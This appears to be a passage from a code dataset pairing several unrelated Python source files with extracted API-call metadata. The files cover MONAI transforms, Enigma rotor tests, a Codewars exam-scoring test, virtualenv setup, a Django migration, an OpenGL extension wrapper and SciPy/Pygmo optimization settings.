652), 'monai.transforms.NormalizeIntensityd', 'transforms.NormalizeIntensityd', (['"""image"""'], {'channel_wise': '(True)'}), "('image', channel_wise=True)\n", (624, 652), False, 'from monai import transforms, data\n'), ((662, 752), 'monai.transforms.Spacingd', 'transforms.Spacingd', (["['image', 'label']"], {'pixdim': 'spacing', 'mode': "('bilinear', 'bilinear')"}), "(['image', 'label'], pixdim=spacing, mode=('bilinear',\n 'bilinear'))\n", (681, 752), False, 'from monai import transforms, data\n'), ((781, 850), 'monai.transforms.SpatialPadd', 'transforms.SpatialPadd', (["['image', 'label']"], {'spatial_size': 'spatial_size'}), "(['image', 'label'], spatial_size=spatial_size)\n", (803, 850), False, 'from monai import transforms, data\n'), ((860, 1044), 'monai.transforms.RandCropByPosNegLabeld', 'transforms.RandCropByPosNegLabeld', (["['image', 'label']"], {'label_key': '"""label"""', 'spatial_size': 'spatial_size', 'pos': '(1)', 'neg': '(1)', 'num_samples': 'num_patches', 'image_key': '"""image"""', 'image_threshold': '(0)'}), "(['image', 'label'], label_key='label',\n spatial_size=spatial_size, pos=1, neg=1, num_samples=num_patches,\n image_key='image', image_threshold=0)\n", (893, 1044), False, 'from monai import transforms, data\n'), ((1153, 1358), 'monai.transforms.RandAffined', 'transforms.RandAffined', (["['image', 'label']"], {'prob': '(0.15)', 'spatial_size': 'spatial_size', 'rotate_range': '([30 * np.pi / 180] * 3)', 'scale_range': '([0.3] * 3)', 'mode': "('bilinear', 'bilinear')", 'as_tensor_output': '(False)'}), "(['image', 'label'], prob=0.15, spatial_size=\n spatial_size, rotate_range=[30 * np.pi / 180] * 3, scale_range=[0.3] * \n 3, mode=('bilinear', 'bilinear'), as_tensor_output=False)\n", (1175, 1358), False, 'from monai import transforms, data\n'), ((1453, 1519), 'monai.transforms.RandFlipd', 'transforms.RandFlipd', (["['image', 'label']"], {'prob': '(0.5)', 'spatial_axis': '(0)'}), "(['image', 'label'], prob=0.5, spatial_axis=0)\n", (1473, 1519), False, 'from monai import transforms, data\n'), ((1529, 1595), 'monai.transforms.RandFlipd', 'transforms.RandFlipd', (["['image', 'label']"], {'prob': '(0.5)', 'spatial_axis': '(1)'}), "(['image', 'label'], prob=0.5, spatial_axis=1)\n", (1549, 1595), False, 'from monai import transforms, data\n'), ((1605, 1671), 'monai.transforms.RandFlipd', 'transforms.RandFlipd', (["['image', 'label']"], {'prob': '(0.5)', 'spatial_axis': '(2)'}), "(['image', 'label'], prob=0.5, spatial_axis=2)\n", (1625, 1671), False, 'from monai import transforms, data\n'), ((1681, 1739), 'monai.transforms.RandGaussianNoised', 'transforms.RandGaussianNoised', (['"""image"""'], {'prob': '(0.15)', 'std': '(0.1)'}), "('image', prob=0.15, std=0.1)\n", (1710, 1739), False, 'from monai import transforms, data\n'), ((1749, 1863), 'monai.transforms.RandGaussianSmoothd', 'transforms.RandGaussianSmoothd', (['"""image"""'], {'prob': '(0.15)', 'sigma_x': '(0.5, 1.5)', 'sigma_y': '(0.5, 1.5)', 'sigma_z': '(0.5, 1.5)'}), "('image', prob=0.15, sigma_x=(0.5, 1.5),\n sigma_y=(0.5, 1.5), sigma_z=(0.5, 1.5))\n", (1779, 1863), False, 'from monai import transforms, data\n'), ((1940, 2003), 'monai.transforms.RandScaleIntensityd', 'transforms.RandScaleIntensityd', (['"""image"""'], {'prob': '(0.15)', 'factors': '(0.3)'}), "('image', prob=0.15, factors=0.3)\n", (1970, 2003), False, 'from monai import transforms, data\n'), ((2013, 2076), 'monai.transforms.RandShiftIntensityd', 'transforms.RandShiftIntensityd', (['"""image"""'], {'prob': '(0.15)', 'offsets': '(0.1)'}), "('image', prob=0.15, offsets=0.1)\n", (2043, 2076), False, 'from monai import transforms, data\n'), ((2086, 2154), 'monai.transforms.RandAdjustContrastd', 'transforms.RandAdjustContrastd', (['"""image"""'], {'prob': '(0.15)', 'gamma': '(0.7, 1.5)'}), "('image', prob=0.15, gamma=(0.7, 1.5))\n", (2116, 2154), False, 'from monai import transforms, data\n'), ((2164, 2210), 'monai.transforms.AsDiscreted', 'transforms.AsDiscreted', (['"""label"""'], {'threshold': '(0.5)'}), "('label', threshold=0.5)\n", (2186, 2210), False, 'from monai import transforms, data\n'), ((2220, 2260), 'monai.transforms.ToTensord', 'transforms.ToTensord', (["['image', 'label']"], {}), "(['image', 'label'])\n", (2240, 2260), False, 'from monai import transforms, data\n'), ((2642, 2698), 'monai.transforms.AddChanneld', 'transforms.AddChanneld', (['"""label"""'], {'allow_missing_keys': '(True)'}), "('label', allow_missing_keys=True)\n", (2664, 2698), False, 'from monai import transforms, data\n'), ((2708, 2780), 'monai.transforms.NormalizeIntensityd', 'transforms.NormalizeIntensityd', (['"""image"""'], {'nonzero': '(True)', 'channel_wise': '(True)'}), "('image', nonzero=True, channel_wise=True)\n", (2738, 2780), False, 'from monai import transforms, data\n'), ((2812, 2877), 'monai.transforms.ToTensord', 'transforms.ToTensord', (["['image', 'label']"], {'allow_missing_keys': '(True)'}), "(['image', 'label'], allow_missing_keys=True)\n", (2832, 2877), False, 'from monai import transforms, data\n'), ((3335, 3391), 'monai.transforms.AddChanneld', 'transforms.AddChanneld', (['"""label"""'], {'allow_missing_keys': '(True)'}), "('label', allow_missing_keys=True)\n", (3357, 3391), False, 'from monai import transforms, data\n'), ((3401, 3459), 'monai.transforms.NormalizeIntensityd', 'transforms.NormalizeIntensityd', (['"""image"""'], {'channel_wise': '(True)'}), "('image', channel_wise=True)\n", (3431, 3459), False, 'from monai import transforms, data\n'), ((3469, 3564), 'monai.transforms.Spacingd', 'transforms.Spacingd', ([], {'keys': "['image', 'label']", 'pixdim': 'spacing', 'mode': "('bilinear', 'nearest')"}), "(keys=['image', 'label'], pixdim=spacing, mode=(\n 'bilinear', 'nearest'))\n", (3488, 3564), False, 'from monai import transforms, data\n'), ((3616, 3681), 'monai.transforms.ToTensord', 'transforms.ToTensord', (["['image', 'label']"], {'allow_missing_keys': '(True)'}), "(['image', 'label'], allow_missing_keys=True)\n", (3636, 3681), False, 'from monai import transforms, data\n'), ((5761, 5801), 'monai.transforms.Lambdad', 'transforms.Lambdad', (['"""input"""', '(lambda x: x)'], {}), "('input', lambda x: x)\n", (5779, 5801), False, 'from monai import transforms, data\n'), ((5930, 5972), 'monai.transforms.Lambdad', 'transforms.Lambdad', (['"""input"""', 'torch.sigmoid'], {}), "('input', torch.sigmoid)\n", (5948, 5972), False, 'from monai import transforms, data\n'), ((6102, 6147), 'monai.transforms.Lambdad', 'transforms.Lambdad', (['"""input"""', '(lambda x: x >= 0)'], {}), "('input', lambda x: x >= 0)\n", (6120, 6147), False, 'from monai import transforms, data\n')] |
"""Base class for rotor tests."""
import unittest
from enigma.rotor.reflector import Reflector
from enigma.rotor.rotor import Rotor
class RotorTest(unittest.TestCase):
"""Provides tools testing rotors."""
def get_rotor(
self,
wiring="EKMFLGDQVZNTOWYHXUSPAIBRCJ",
ring_setting=1,
position="A",
turnover_positions=["R"],
):
"""Return Rotor object."""
return Rotor(
wiring=wiring,
ring_setting=ring_setting,
position=position,
turnover_positions=turnover_positions,
)
def get_reflector(self, wiring="YRUHQSLDPXNGOKMIEBFZCWVJAT"):
"""Return Reflector object."""
return Reflector(wiring=wiring)
| [
"enigma.rotor.reflector.Reflector",
"enigma.rotor.rotor.Rotor"
] | [((429, 538), 'enigma.rotor.rotor.Rotor', 'Rotor', ([], {'wiring': 'wiring', 'ring_setting': 'ring_setting', 'position': 'position', 'turnover_positions': 'turnover_positions'}), '(wiring=wiring, ring_setting=ring_setting, position=position,\n turnover_positions=turnover_positions)\n', (434, 538), False, 'from enigma.rotor.rotor import Rotor\n'), ((715, 739), 'enigma.rotor.reflector.Reflector', 'Reflector', ([], {'wiring': 'wiring'}), '(wiring=wiring)\n', (724, 739), False, 'from enigma.rotor.reflector import Reflector\n')] |
# Created by <NAME>.
# GitHub: https://github.com/ikostan
# LinkedIn: https://www.linkedin.com/in/egor-kostan/
# FUNDAMENTALS ARRAYS NUMBERS BASIC LANGUAGE FEATURES
import unittest
import allure
from utils.log_func import print_log
from kyu_8.check_the_exam.check_exam import check_exam
@allure.epic('8 kyu')
@allure.parent_suite('Beginner')
@allure.suite("Data Structures")
@allure.sub_suite("Unit Tests")
@allure.feature("Lists")
@allure.story('Check the exam')
@allure.tag('FUNDAMENTALS', 'ARRAYS', 'NUMBERS', 'BASIC LANGUAGE FEATURES')
@allure.link(url='https://www.codewars.com/kata/5a3dd29055519e23ec000074/train/python',
name='Source/Kata')
class CheckExamTestCase(unittest.TestCase):
"""
Testing check_exam function
"""
def test_check_exam(self):
"""
Testing check_exam function
The function should return the score
for this array of answers, giving +4
for each correct answer, -1 for each
incorrect answer, and +0 for each blank
answer(empty string).
:return:
"""
allure.dynamic.title("Testing check_exam function")
allure.dynamic.severity(allure.severity_level.NORMAL)
allure.dynamic.description_html('<h3>Codewars badge:</h3>'
'<img src="https://www.codewars.com/users/myFirstCode'
'/badges/large">'
'<h3>Test Description:</h3>'
"<p></p>")
with allure.step("Enter arr1 and arr2 and verify the output"):
data = [
(["a", "a", "b", "b"], ["a", "c", "b", "d"], 6),
(["a", "a", "c", "b"], ["a", "a", "b", ""], 7),
(["a", "a", "b", "c"], ["a", "a", "b", "c"], 16),
(["b", "c", "b", "a"], ["", "a", "a", "c"], 0),
]
for arr1, arr2, expected in data:
print_log(arr1=arr1,
arr2=arr2,
expected=expected)
self.assertEqual(expected,
check_exam(arr1, arr2))
| [
"allure.parent_suite",
"allure.tag",
"allure.step",
"kyu_8.check_the_exam.check_exam.check_exam",
"allure.sub_suite",
"allure.dynamic.severity",
"allure.story",
"allure.link",
"allure.dynamic.description_html",
"allure.epic",
"allure.suite",
"allure.dynamic.title",
"allure.feature",
"utils... | [((295, 315), 'allure.epic', 'allure.epic', (['"""8 kyu"""'], {}), "('8 kyu')\n", (306, 315), False, 'import allure\n'), ((317, 348), 'allure.parent_suite', 'allure.parent_suite', (['"""Beginner"""'], {}), "('Beginner')\n", (336, 348), False, 'import allure\n'), ((350, 381), 'allure.suite', 'allure.suite', (['"""Data Structures"""'], {}), "('Data Structures')\n", (362, 381), False, 'import allure\n'), ((383, 413), 'allure.sub_suite', 'allure.sub_suite', (['"""Unit Tests"""'], {}), "('Unit Tests')\n", (399, 413), False, 'import allure\n'), ((415, 438), 'allure.feature', 'allure.feature', (['"""Lists"""'], {}), "('Lists')\n", (429, 438), False, 'import allure\n'), ((440, 470), 'allure.story', 'allure.story', (['"""Check the exam"""'], {}), "('Check the exam')\n", (452, 470), False, 'import allure\n'), ((472, 546), 'allure.tag', 'allure.tag', (['"""FUNDAMENTALS"""', '"""ARRAYS"""', '"""NUMBERS"""', '"""BASIC LANGUAGE FEATURES"""'], {}), "('FUNDAMENTALS', 'ARRAYS', 'NUMBERS', 'BASIC LANGUAGE FEATURES')\n", (482, 546), False, 'import allure\n'), ((548, 663), 'allure.link', 'allure.link', ([], {'url': '"""https://www.codewars.com/kata/5a3dd29055519e23ec000074/train/python"""', 'name': '"""Source/Kata"""'}), "(url=\n 'https://www.codewars.com/kata/5a3dd29055519e23ec000074/train/python',\n name='Source/Kata')\n", (559, 663), False, 'import allure\n'), ((1092, 1143), 'allure.dynamic.title', 'allure.dynamic.title', (['"""Testing check_exam function"""'], {}), "('Testing check_exam function')\n", (1112, 1143), False, 'import allure\n'), ((1152, 1205), 'allure.dynamic.severity', 'allure.dynamic.severity', (['allure.severity_level.NORMAL'], {}), '(allure.severity_level.NORMAL)\n', (1175, 1205), False, 'import allure\n'), ((1214, 1383), 'allure.dynamic.description_html', 'allure.dynamic.description_html', (['"""<h3>Codewars badge:</h3><img src="https://www.codewars.com/users/myFirstCode/badges/large"><h3>Test Description:</h3><p></p>"""'], {}), '(\n \'<h3>Codewars badge:</h3><img src="https://www.codewars.com/users/myFirstCode/badges/large"><h3>Test Description:</h3><p></p>\'\n )\n', (1245, 1383), False, 'import allure\n'), ((1560, 1616), 'allure.step', 'allure.step', (['"""Enter arr1 and arr2 and verify the output"""'], {}), "('Enter arr1 and arr2 and verify the output')\n", (1571, 1616), False, 'import allure\n'), ((1977, 2027), 'utils.log_func.print_log', 'print_log', ([], {'arr1': 'arr1', 'arr2': 'arr2', 'expected': 'expected'}), '(arr1=arr1, arr2=arr2, expected=expected)\n', (1986, 2027), False, 'from utils.log_func import print_log\n'), ((2157, 2179), 'kyu_8.check_the_exam.check_exam.check_exam', 'check_exam', (['arr1', 'arr2'], {}), '(arr1, arr2)\n', (2167, 2179), False, 'from kyu_8.check_the_exam.check_exam import check_exam\n')] |
import os.path
from twisted.internet import defer
import pysoup.utils
class Virtualenv(object):
def __init__(self, display_pip, path):
self._display_pipe = display_pip
self._path = path
@property
def path(self):
return self._path
@property
def venv_path(self):
return os.path.join(self._path, 'venv')
@property
def source_path(self):
return os.path.join(self.venv_path, 'bin/activate')
@defer.inlineCallbacks
def create(self):
self._display_pipe.log('Ensuring virtualenv environment at {0}'.format(self._path))
code = yield pysoup.utils.execute_shell_command('mkdir -p {0} && virtualenv --no-site-packages -q {0}'.format(self.venv_path))
if code != 0:
self._display_pipe.error('Failed to setup virtualenv at target! ({0})'.format(self._path))
raise Exception('Could not create virtualenv')
self._display_pipe.notify('Virtualenv is ready')
@defer.inlineCallbacks
def execute_in_venv(self, command):
code = yield pysoup.utils.execute_shell_command('source {0} && {1}'.format(self.source_path, command))
defer.returnValue(code)
| [
"twisted.internet.defer.returnValue"
] | [((1169, 1192), 'twisted.internet.defer.returnValue', 'defer.returnValue', (['code'], {}), '(code)\n', (1186, 1192), False, 'from twisted.internet import defer\n')] |
from yggdrasil.metaschema.datatypes import MetaschemaTypeError
from yggdrasil.metaschema.datatypes.MetaschemaType import MetaschemaType
from yggdrasil.metaschema.datatypes.JSONObjectMetaschemaType import (
JSONObjectMetaschemaType)
from yggdrasil.metaschema.properties.ArgsMetaschemaProperty import (
ArgsMetaschemaProperty)
class InstanceMetaschemaType(MetaschemaType):
r"""Type for evaluating instances of Python classes."""
name = 'instance'
description = 'Type for Python class instances.'
properties = ['class', 'args']
definition_properties = ['class']
metadata_properties = ['class', 'args']
extract_properties = ['class', 'args']
python_types = (object, )
cross_language_support = False
@classmethod
def validate(cls, obj, raise_errors=False):
r"""Validate an object to check if it could be of this type.
Args:
obj (object): Object to validate.
raise_errors (bool, optional): If True, errors will be raised when
the object fails to be validated. Defaults to False.
Returns:
bool: True if the object could be of this type, False otherwise.
"""
# Base not called because every python object should pass validation
# against the object class
try:
ArgsMetaschemaProperty.instance2args(obj)
return True
except MetaschemaTypeError:
if raise_errors:
raise ValueError("Class dosn't have an input_args attribute.")
return False
@classmethod
def encode_data(cls, obj, typedef):
r"""Encode an object's data.
Args:
obj (object): Object to encode.
typedef (dict): Type definition that should be used to encode the
object.
Returns:
string: Encoded object.
"""
args = ArgsMetaschemaProperty.instance2args(obj)
if isinstance(typedef, dict) and ('args' in typedef):
typedef_args = {'properties': typedef['args']}
else:
typedef_args = None
return JSONObjectMetaschemaType.encode_data(args, typedef_args)
@classmethod
def decode_data(cls, obj, typedef):
r"""Decode an object.
Args:
obj (string): Encoded object to decode.
typedef (dict): Type definition that should be used to decode the
object.
Returns:
object: Decoded object.
"""
# TODO: Normalization can be removed if metadata is normalized
typedef = cls.normalize_definition(typedef)
args = JSONObjectMetaschemaType.decode_data(
obj, {'properties': typedef.get('args', {})})
return typedef['class'](**args)
| [
"yggdrasil.metaschema.datatypes.JSONObjectMetaschemaType.JSONObjectMetaschemaType.encode_data",
"yggdrasil.metaschema.properties.ArgsMetaschemaProperty.ArgsMetaschemaProperty.instance2args"
] | [((1912, 1953), 'yggdrasil.metaschema.properties.ArgsMetaschemaProperty.ArgsMetaschemaProperty.instance2args', 'ArgsMetaschemaProperty.instance2args', (['obj'], {}), '(obj)\n', (1948, 1953), False, 'from yggdrasil.metaschema.properties.ArgsMetaschemaProperty import ArgsMetaschemaProperty\n'), ((2136, 2192), 'yggdrasil.metaschema.datatypes.JSONObjectMetaschemaType.JSONObjectMetaschemaType.encode_data', 'JSONObjectMetaschemaType.encode_data', (['args', 'typedef_args'], {}), '(args, typedef_args)\n', (2172, 2192), False, 'from yggdrasil.metaschema.datatypes.JSONObjectMetaschemaType import JSONObjectMetaschemaType\n'), ((1331, 1372), 'yggdrasil.metaschema.properties.ArgsMetaschemaProperty.ArgsMetaschemaProperty.instance2args', 'ArgsMetaschemaProperty.instance2args', (['obj'], {}), '(obj)\n', (1367, 1372), False, 'from yggdrasil.metaschema.properties.ArgsMetaschemaProperty import ArgsMetaschemaProperty\n')] |
# Generated by Django 2.1.3 on 2018-12-02 17:52
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('battleships', '0003_auto_20181202_1832'),
]
operations = [
migrations.RenameField(
model_name='coordinate',
old_name='ship',
new_name='ship1',
),
]
| [
"django.db.migrations.RenameField"
] | [((231, 318), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""coordinate"""', 'old_name': '"""ship"""', 'new_name': '"""ship1"""'}), "(model_name='coordinate', old_name='ship', new_name=\n 'ship1')\n", (253, 318), False, 'from django.db import migrations\n')] |
import abc
import os
import pandas as pd
import numpy as np
from EoraReader import EoraReader
class PrimaryInputs(EoraReader):
def __init__(self, file_path):
super().__init__(file_path)
self.df = None
def get_dataset(self, extended = False):
"""
Returns a pandas dataframe containing domestic transactions from the input-output table
"""
value_add_coefficients = []
primary_inputs = []
industry_count = self.industry_header.count("Industries")
primary_inputs_pos = 0
line = self.file.readline().strip().split('\t')
while line[2] != "Primary Inputs":
line = self.file.readline().strip().split('\t')
while line[2] == "Primary Inputs":
primary_inputs.append(line[3])
value_add_coefficients.append(line[4:(4 + industry_count)])
line = self.file.readline().strip().split('\t')
numpy_data = np.array(value_add_coefficients)
df = pd.DataFrame(data = numpy_data, index = primary_inputs)
df.columns = self.industries[0:industry_count]
if extended:
df.loc[:, 'year'] = self.year
df.loc[:, 'country'] = self.country
self.df = df
self.extended = extended
return df
| [
"pandas.DataFrame",
"numpy.array"
] | [((948, 980), 'numpy.array', 'np.array', (['value_add_coefficients'], {}), '(value_add_coefficients)\n', (956, 980), True, 'import numpy as np\n'), ((994, 1045), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'numpy_data', 'index': 'primary_inputs'}), '(data=numpy_data, index=primary_inputs)\n', (1006, 1045), True, 'import pandas as pd\n')] |
'''OpenGL extension ATI.text_fragment_shader
This module customises the behaviour of the
OpenGL.raw.GL.ATI.text_fragment_shader to provide a more
Python-friendly API
Overview (from the spec)
The ATI_fragment_shader extension exposes a powerful fragment
processing model that provides a very general means of expressing
fragment color blending and dependent texture address modification.
The processing is termed a fragment shader or fragment program and
is specifed using a register-based model in which there are fixed
numbers of instructions, texture lookups, read/write registers, and
constants.
ATI_fragment_shader provides a unified instruction set
for operating on address or color data and eliminates the
distinction between the two. That extension provides all the
interfaces necessary to fully expose this programmable fragment
processor in GL.
ATI_text_fragment_shader is a redefinition of the
ATI_fragment_shader functionality, using a slightly different
interface. The intent of creating ATI_text_fragment_shader is to
take a step towards treating fragment programs similar to other
programmable parts of the GL rendering pipeline, specifically
vertex programs. This new interface is intended to appear
similar to the ARB_vertex_program API, within the limits of the
feature set exposed by the original ATI_fragment_shader extension.
The most significant differences between the two extensions are:
(1) ATI_fragment_shader provides a procedural function call
interface to specify the fragment program, whereas
ATI_text_fragment_shader uses a textual string to specify
the program. The fundamental syntax and constructs of the
program "language" remain the same.
(2) The program object managment portions of the interface,
namely the routines used to create, bind, and delete program
objects and set program constants are managed
using the framework defined by ARB_vertex_program.
(3) ATI_fragment_shader refers to the description of the
programmable fragment processing as a "fragment shader".
In keeping with the desire to treat all programmable parts
of the pipeline consistently, ATI_text_fragment_shader refers
to these as "fragment programs". The name of the extension is
left as ATI_text_fragment_shader instead of
ATI_text_fragment_program in order to indicate the underlying
similarity between the API's of the two extensions, and to
differentiate it from any other potential extensions that
may be able to move even further in the direction of treating
fragment programs as just another programmable area of the
GL pipeline.
Although ATI_fragment_shader was originally conceived as a
device-independent extension that would expose the capabilities of
future generations of hardware, changing trends in programmable
hardware have affected the lifespan of this extension. For this
reason you will now find a fixed set of features and resources
exposed, and the queries to determine this set have been deprecated
in ATI_fragment_shader. Further, in ATI_text_fragment_shader,
most of these resource limits are fixed by the text grammar and
the queries have been removed altogether.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ATI/text_fragment_shader.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ATI.text_fragment_shader import *
from OpenGL.raw.GL.ATI.text_fragment_shader import _EXTENSION_NAME
def glInitTextFragmentShaderATI():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION | [
"OpenGL.extensions.hasGLExtension"
] | [((3804, 3846), 'OpenGL.extensions.hasGLExtension', 'extensions.hasGLExtension', (['_EXTENSION_NAME'], {}), '(_EXTENSION_NAME)\n', (3829, 3846), False, 'from OpenGL import extensions\n')] |
import attr
import types
from typing import Union
from enum import Enum
import numpy as np
from scipy.optimize import differential_evolution
import pygmo as pg
class OptimizationMethod(Enum):
"""
Available optimization solvers.
"""
SCIPY_DE = 1
PYGMO_DE1220 = 2
@attr.s(auto_attribs=True)
class ScipyDifferentialEvolutionSettings:
"""
Optional arguments to pass for SciPy's differential evolution caller.
Members
----------------
:ivar str strategy:
The differential evolution strategy to use. Should be one of: - 'best1bin' - 'best1exp' - 'rand1exp' -
'randtobest1exp' - 'currenttobest1exp' - 'best2exp' - 'rand2exp' - 'randtobest1bin' - 'currenttobest1bin' -
'best2bin' - 'rand2bin' - 'rand1bin' The default is 'best1bin'.
:ivar float recombination:
The recombination constant, should be in the range [0, 1]. In the literature this is also known as the crossover
probability, being denoted by CR. Increasing this value allows a larger number of mutants to progress into the
next generation, but at the risk of population stability.
:ivar float mutation:
The mutation constant. In the literature this is also known as differential weight, being denoted by F. If
specified as a float it should be in the range [0, 2].
:ivar float tol:
Relative tolerance for convergence, the solving stops when `np.std(pop) = atol + tol * np.abs(np.mean(population_energies))`,
where and `atol` and `tol` are the absolute and relative tolerance respectively.
:ivar int|numpy.random.RandomState seed:
If `seed` is not specified the `np.RandomState` singleton is used. If `seed` is an int, a new
`np.random.RandomState` instance is used, seeded with seed. If `seed` is already a `np.random.RandomState instance`,
then that `np.random.RandomState` instance is used. Specify `seed` for repeatable minimizations.
:ivar int workers:
If `workers` is an int the population is subdivided into `workers` sections and evaluated in parallel
(uses `multiprocessing.Pool`). Supply -1 to use all available CPU cores. Alternatively supply a map-like
callable, such as `multiprocessing.Pool.map` for evaluating the population in parallel. This evaluation is
carried out as `workers(func, iterable)`.
:ivar bool disp:
Display status messages during optimization iterations.
:ivar polish:
If True (default), then `scipy.optimize.minimize` with the `L-BFGS-B` method is used to polish the best
population member at the end, which can improve the minimization slightly.
"""
number_of_decision_variables: int
strategy: str = 'best1bin'
recombination: float = 0.3
mutation: float = 0.6
tol: float = 1e-5
seed: Union[np.random.RandomState, int] = np.random.RandomState()
workers: int = 1
disp: bool = False
polish: bool = True
popsize: int = None
population_size_for_each_variable: int = 15
total_population_size_limit: int = 100
def __attrs_post_init__(self):
if self.popsize is None:
self.popsize = self._estimate_population_size()
elif self.popsize <= 0:
raise ValueError('Number of individuals must be greater than 0.')
if type(self.popsize) != int:
raise TypeError('Population size must be an integer number.')
if not 0 < self.recombination <= 1:
raise ValueError('Recombination must be a value between 0 and 1.')
if type(self.mutation) == tuple:
mutation_dithering_array = np.array(self.mutation)
if len(self.mutation) > 2:
raise ValueError('Mutation can be a tuple with two numbers, not more.')
if mutation_dithering_array.min() < 0 or mutation_dithering_array.max() > 2:
raise ValueError('Mutation must be floats between 0 and 2.')
elif mutation_dithering_array.min() == mutation_dithering_array.max():
raise ValueError("Values for mutation dithering can't be equal.")
else:
if type(self.mutation) != int and type(self.mutation) != float:
raise TypeError('When mutation is provided as a single number, it must be a float or an int.')
if not 0 < self.mutation < 2:
raise ValueError('Mutation must be a number between 0 and 2.')
if self.tol < 0:
raise ValueError('Tolerance must be a positive float.')
def _estimate_population_size(self):
population_size = self.population_size_for_each_variable * self.number_of_decision_variables
if population_size > self.total_population_size_limit:
population_size = self.total_population_size_limit
return population_size
@attr.s(auto_attribs=True)
class PygmoSelfAdaptiveDESettings:
# TODO: docs and validations
gen: int
popsize: int
allowed_variants: list = [2, 6, 7]
variant_adptv: int = 2
ftol: float = 1e-6
xtol: float = 1e-6
memory: bool = True
seed: int = int(np.random.randint(0, 2000))
polish: bool = True
polish_method: str = 'tnewton_precond_restart'
parallel_execution: bool = False
number_of_islands: int = 2
archipelago_gen: int = 50
@attr.s(auto_attribs=True)
class PygmoOptimizationProblemWrapper:
# TODO: docs and validations
objective_function: types.FunctionType
bounds: list
args: list = []
def fitness(self, x):
return [self.objective_function(x, *self.args)]
def get_bounds(self):
return self._transform_bounds_to_pygmo_standard
def gradient(self, x):
return pg.estimate_gradient_h(lambda x: self.fitness(x), x)
@property
def _transform_bounds_to_pygmo_standard(self):
bounds_numpy = np.array(self.bounds, dtype=np.float64)
lower_bounds = list(bounds_numpy[:, 0])
upper_bounds = list(bounds_numpy[:, 1])
return lower_bounds, upper_bounds
@attr.s(auto_attribs=True)
class PygmoSolutionWrapperSerial:
# TODO: docs and validations
solution: pg.core.population
@property
def fun(self):
return self.solution.champion_f
@property
def x(self):
return self.solution.champion_x
@attr.s(auto_attribs=True)
class PygmoSolutionWrapperParallel:
# TODO: docs and validations
champion_x: np.ndarray
champion_f: Union[float, np.float64, np.ndarray]
@property
def fun(self):
return self.champion_f
@property
def x(self):
return self.champion_x
@attr.s(auto_attribs=True)
class OptimizationProblem:
"""
This class stores and solve optimization problems with the available solvers.
"""
# TODO: docs and validations
objective_function: types.FunctionType
bounds: list
optimization_method: OptimizationMethod
solver_args: Union[ScipyDifferentialEvolutionSettings, PygmoSelfAdaptiveDESettings]
args: list = []
def __attrs_post_init__(self):
if self.optimization_method == OptimizationMethod.SCIPY_DE and self.solver_args is None:
self.solver_args = ScipyDifferentialEvolutionSettings(self._number_of_decision_variables)
@property
def _number_of_decision_variables(self):
return len(self.bounds)
def solve_minimization(self):
if self.optimization_method == OptimizationMethod.SCIPY_DE:
result = differential_evolution(
self.objective_function,
bounds=self.bounds,
args=self.args,
strategy=self.solver_args.strategy,
popsize=self.solver_args.popsize,
recombination=self.solver_args.recombination,
mutation=self.solver_args.mutation,
tol=self.solver_args.tol,
disp=self.solver_args.disp,
polish=self.solver_args.polish,
seed=self.solver_args.seed,
workers=self.solver_args.workers
)
return result
elif self.optimization_method == OptimizationMethod.PYGMO_DE1220:
problem_wrapper = PygmoOptimizationProblemWrapper(
objective_function=self.objective_function,
bounds=self.bounds,
args=self.args
)
pygmo_algorithm = pg.algorithm(
pg.de1220(
gen=self.solver_args.gen,
allowed_variants=self.solver_args.allowed_variants,
variant_adptv=self.solver_args.variant_adptv,
ftol=self.solver_args.ftol,
xtol=self.solver_args.xtol,
memory=self.solver_args.memory,
seed=self.solver_args.seed
)
)
pygmo_problem = pg.problem(problem_wrapper)
if self.solver_args.parallel_execution:
solution_wrapper = self._run_pygmo_parallel(
pygmo_algorithm,
pygmo_problem,
number_of_islands=self.solver_args.number_of_islands,
archipelago_gen=self.solver_args.archipelago_gen
)
else:
pygmo_solution = self._run_pygmo_serial(pygmo_algorithm, pygmo_problem)
if self.solver_args.polish:
pygmo_solution = self._polish_pygmo_population(pygmo_solution)
solution_wrapper = PygmoSolutionWrapperSerial(pygmo_solution)
return solution_wrapper
else:
raise NotImplementedError('Unavailable optimization method.')
@staticmethod
def _select_best_pygmo_archipelago_solution(champions_x, champions_f):
best_index = np.argmin(champions_f)
return champions_x[best_index], champions_f[best_index]
def _run_pygmo_parallel(self, algorithm, problem, number_of_islands=2, archipelago_gen=50):
pygmo_archipelago = pg.archipelago(
n=number_of_islands,
algo=algorithm,
prob=problem,
pop_size=self.solver_args.popsize,
seed=self.solver_args.seed
)
pygmo_archipelago.evolve(n=archipelago_gen)
pygmo_archipelago.wait()
champions_x = pygmo_archipelago.get_champions_x()
champions_f = pygmo_archipelago.get_champions_f()
champion_x, champion_f = self._select_best_pygmo_archipelago_solution(champions_x, champions_f)
return PygmoSolutionWrapperParallel(champion_x=champion_x, champion_f=champion_f)
def _run_pygmo_serial(self, algorithm, problem):
population = pg.population(
prob=problem,
size=self.solver_args.popsize,
seed=self.solver_args.seed
)
solution = algorithm.evolve(population)
return solution
def _polish_pygmo_population(self, population):
pygmo_nlopt_wrapper = pg.nlopt(self.solver_args.polish_method)
nlopt_algorithm = pg.algorithm(pygmo_nlopt_wrapper)
solution_wrapper = nlopt_algorithm.evolve(population)
return solution_wrapper
| [
"attr.s",
"pygmo.archipelago",
"scipy.optimize.differential_evolution",
"pygmo.problem",
"pygmo.population",
"numpy.array",
"numpy.random.randint",
"pygmo.algorithm",
"pygmo.de1220",
"numpy.argmin",
"numpy.random.RandomState",
"pygmo.nlopt"
